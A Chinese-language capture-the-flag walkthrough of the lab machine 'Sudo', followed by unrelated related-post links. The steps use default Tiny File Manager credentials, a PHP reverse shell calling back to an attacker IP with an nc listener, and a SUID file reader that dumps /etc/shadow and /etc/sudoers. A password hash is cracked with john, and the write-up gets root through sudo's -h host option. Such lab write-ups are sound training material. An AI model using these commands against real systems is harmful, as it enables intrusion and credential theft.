20250711_Sudo 靶机复盘

target:192.168.43.20

外部打点 (文件上传)

nmap扫一下,80,22 开放

扫目录,发现 README.md

复制代码
[17:04:30] 200 -  664B  - /Dockerfile                                       
[17:04:38] 200 -   34KB - /LICENSE                                          
[17:04:48] 200 -    5KB - /README.md                                        
[17:04:50] 403 -  278B  - /server-status/                                   
[17:04:50] 403 -  278B  - /server-status                                    
[17:04:55] 200 -    4KB - /tinyfilemanager.php 

Default username/password: **admin/admin@123** and **user/12345**.

得到账号密码 ==> admin:admin@123

进入 web 界面,成功登录

登录后进入文件上传功能,上传 php-reverse-shell.php,攻击机开监听 nc -lvnp 8999

浏览器访问 http://192.168.43.20/php-reverse-shell.php 成功反弹shell

复制代码
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.43.57';  // CHANGE THIS
$port = 8999;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
...

权限提升 (文件读取和sudo配置)

得到 www-data 用户

进入/home/eecho,得到 user.txt,即 flag1

上传 linpeas ,全局扫描可疑点

也可以 find / -perm -4000 2>/dev/null 查找具有 suid 位的文件

找到 /usr/bin/read_file 这个特殊的可执行文件

复制代码
-rwsr-sr-x 1 root root 17528 Jul  9 05:01 /usr/bin/read_file

查看帮助

复制代码
Usage: read_file -f <filepath>
Options:
  -h         Show this help message
  -f <file>  Specify the file to view (must be under /etc)

Security restrictions:
  - File path must start with /etc/
  - Symbolic links and path traversal are blocked
  - Only regular files can be read

也就是可以读取 /etc 下的文件

直接读取 /etc/shadow 和 /etc/soduers

拿到加密后的 root 和 eecho 的密码,以及 soduers 配置

复制代码
eecho:$6$mL.9/fVsBqItNR..$GyJfKOjLcovjApxygZ79CjKcqJmJ37jC8y9KeLq81fLAnNCYVP1Nw9d8Dp9pZi/l3CWJ3PHL1l/Hld3sFmZoQ.:20278:0:99999:7:::

爆破 eecho 密码

复制代码
john $6$mL.9/fVsBqItNR..$GyJfKOjLcovjApxygZ79CjKcqJmJ37jC8y9KeLq81fLAnNCYVP1Nw9d8Dp9pZi/l3CWJ3PHL1l/Hld3sFmZoQ.

得到 eecho:alexis15

ssh 连接成功

刚才 sudoers 文件内容如下

复制代码
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL
eecho Dashazi = NOPASSWD:ALL
# See sudoers(5) for more information on "@include" directives:

即 eecho 可以在主机 Dasahzi 上执行任意命令

复制代码
eecho@Sudo:~$ sudo -i -h Dashazi
sudo: unable to resolve host Dashazi: Name or service not known
root@Sudo:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Sudo:~# ls
root.txt
root@Sudo:~# cat root.txt 
flag{root}
root@Sudo:~# 

sudo -h 指定主机,直接切换为 root

结束

总结

首先目录爆破翻配置文件找到默认用户名密码,登录

然后在文件上传点上反弹shell马

进到 home 查看用户

查找到 SUID 位文件 read_file,读取敏感文件 /etc/shadow,/etc/sudoers

爆破加密的密码

成功切换eecho用户后,指定主机名 sudo -i 切换为 root
sudo -i -h Dashazi

相关推荐
开开心心就好2 分钟前
专业鼠标点击器,自定义间隔次数
javascript·安全·计算机外设·excel·音视频·模拟退火算法
鸠摩智首席音效师10 分钟前
如何在 Ubuntu 24.04 安装 KVM ?
linux·运维·ubuntu
静渊谋1 小时前
应急响应整理
linux·windows
CODE_RabbitV1 小时前
Linux 文件与目录操作命令宝典
linux·运维·服务器
gnawkhhkwang1 小时前
io_submit系统调用及示例
linux·c语言
caz281 小时前
麒麟服务器版操作系统添加VNC
linux·服务器·centos·vnc
gnawkhhkwang1 小时前
io_cancel系统调用及示例
linux·c语言
melody_of_Canon1 小时前
uv 常用指令
linux·windows·uv
IT小辉同学1 小时前
CentOS 7 编译 Redis 6.x 完整教程(解决 GCC 版本不支持 C11)
linux·redis·centos
牛牛木有坏心眼(大数据进阶)2 小时前
linux系统离线环境安装clickhouse客户端
linux·clickhouse